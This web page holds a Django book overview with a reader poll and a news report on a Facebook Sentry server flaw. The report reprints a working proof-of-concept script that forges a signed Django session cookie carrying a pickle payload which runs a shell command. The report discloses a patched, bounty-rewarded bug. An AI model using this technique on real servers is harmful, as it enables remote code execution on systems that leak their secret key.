Django books overview

Two Scoops of Django, Beginning Django CMS and Django Unleashed books overview
16 August 2017   33772

Django is one of the most popular frameworks for Python, which is number one programming language in the world, according to the IEEE Spectrum.

Let's take a look on few interesting Django books.

Two Scoops of Django: Best Practices for Django 1.8

This book is full of material that will help you with your Django projects. Authored by Daniel Roy Greenfeld and Audrey Roy Greenfeld.

Two Scoops of Django
Two Scoops of Django

It will introduce you to various tips, tricks, patterns, code snippets, and techniques that authors picked up over the years. This book is an update and expansion of previous editions:

  • Updated for Django 1.8 and changes in the Django ecosystem, with corrections and clarifications added thanks to the feedback of our readers and technical reviewers.
  • Revised material on templates, consuming REST APIs, replacing core components of Django, and more.
  • 85+ pages of new material on Jinja2, debugging, advanced query tools, data validation, testing, security, and more

Available here

Beginning Django CMS

Beginning Django CMS shows you how to build a dynamic website with a full content management system in the backend easily. It is written for Internet developers who are tired of dealing with complicated, bloated website frameworks that are a pain to build and a nightmare to maintain. Django CMS is an Open Source website building framework that is experiencing exponential growth because it is built on the simple, secure and scalable architecture of Django. This book takes you from knowing nothing about Django CMS, to building a functional website and content management system that you can deploy for your own website or for your customers. 

Beginning Django CMS
Beginning Django CMS

What You'll Learn:

  • Install and configure Django CMS
  • Build a dynamic website quickly and easily
  • Author and submit content for publication
  • Administer Django CMS
  • Install and use custom and third-party plugins
  • Deploy a website using Django CMS

    Beginning Django CMS is for programmers, in particular Python and Django programmers, wishing to build a simple, custom content management system (CMS). 

Available at Amazon.

Django Unleashed

Django Unleashed is your step-by-step, beginner-friendly guide to leveraging Django’s core capabilities and its powerful contributed library. You’ll learn in the most effective way possible: hands on, by building a fully functional Django website from scratch. You’ll even deploy the website to the cloud.

Django Unleashed
Django Unleashed

This books covers such topics as:

  • Quickly start a new Django project and establish a strong foundation for a growing site
  • Define how your data is organized and create a SQLite database to manage it
  • Quickly produce HTML with Django templates
  • Create dynamic webpages with Django’s URL patterns and views, including function views, class-based views, and generic views
  • Enable efficient, reliable data input with Django Forms and custom form validations
  • Understand the Model-View-Controller (MVC) architecture, compare it to Model-Template-Views, and gain a holistic understanding of Django’s structure
  • Write as little code as possible, simplify code reuse, and mitigate software decay by adhering to the Don’t Repeat Yourself paradigm.
  • Dive into Django source code to troubleshoot problems
  • Extend site functionality with Django’s contributed library
  • Protect your site with user authentication and permissions
  • Avoid security pitfalls such as SQL Injection, XSS, and CSRF
  • Optimize site performance
  • Deploy your site to a managed cloud service and to a PostgreSQL database

Get it at Amazon.

What Django book you like the most?

What Django book do you prefer? Maybe had already read some of them? Please, share your thoughts with the community. Also, after the voting, you will be able to see what people like the most. Your opinion is very valuable for the Hype.Codes team.

Django Unleashed
63% (5 votes)
Two Scoops of Django: Best Practices for Django 1.8
25% (2 votes)
Beginning Django CMS
13% (1 vote)
Total votes: 8

Another Facebook Vulnerability to be Found

Cybersecurity specialist from SCRT find a way to execute code on Facebook server remotely
27 August 2018   605

Daniel Le Gall from SCRT, reported about the vulnerability he found in one of the Facebook servers. The problem is in the Sentry web application for logs storage, written in Python using the Django framework. Facebook experts have already patched a security hole in the server.

Daniel found the problem during the scanning of IP addresses of to the social network. On one of them Sentry service was located with host name sentryagreements.thefacebook.com. When reviewing the application, the specialist noticed a stack trace that appears for an unexpected reason, and problems with the user password reset function. According to him, the Django debugging mode was not disabled, so the trace opened the entire environment of the program:

Facebook Vulnerability
Facebook Vulnerability

SCRT expert discovered among the keys of the environment SESSION_SERIALIZER, which was related to the method django.contrib.sessions.serializers.PickleSerializer. Daniel clarified that using a fake session containing arbitrary content of the binary Pickle protocol for serializing objects in Python, you can run any code in the system. To access the session, he needed a secret Django key, which appeared in the list of Sentry settings in plaintext called system.secret-key:

Facebook Vulnerability
Facebook Vulnerability

The researcher wrote a proof-of-concept script that changed the existing contents of sentrysid cookies to an arbitrary object and made the page load for 30 seconds longer:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent information about the vulnerability to Facebook team and received $ 5000 under the Bug Bounty program. The company specialists cleared the issue in 10 days after receiving the notification.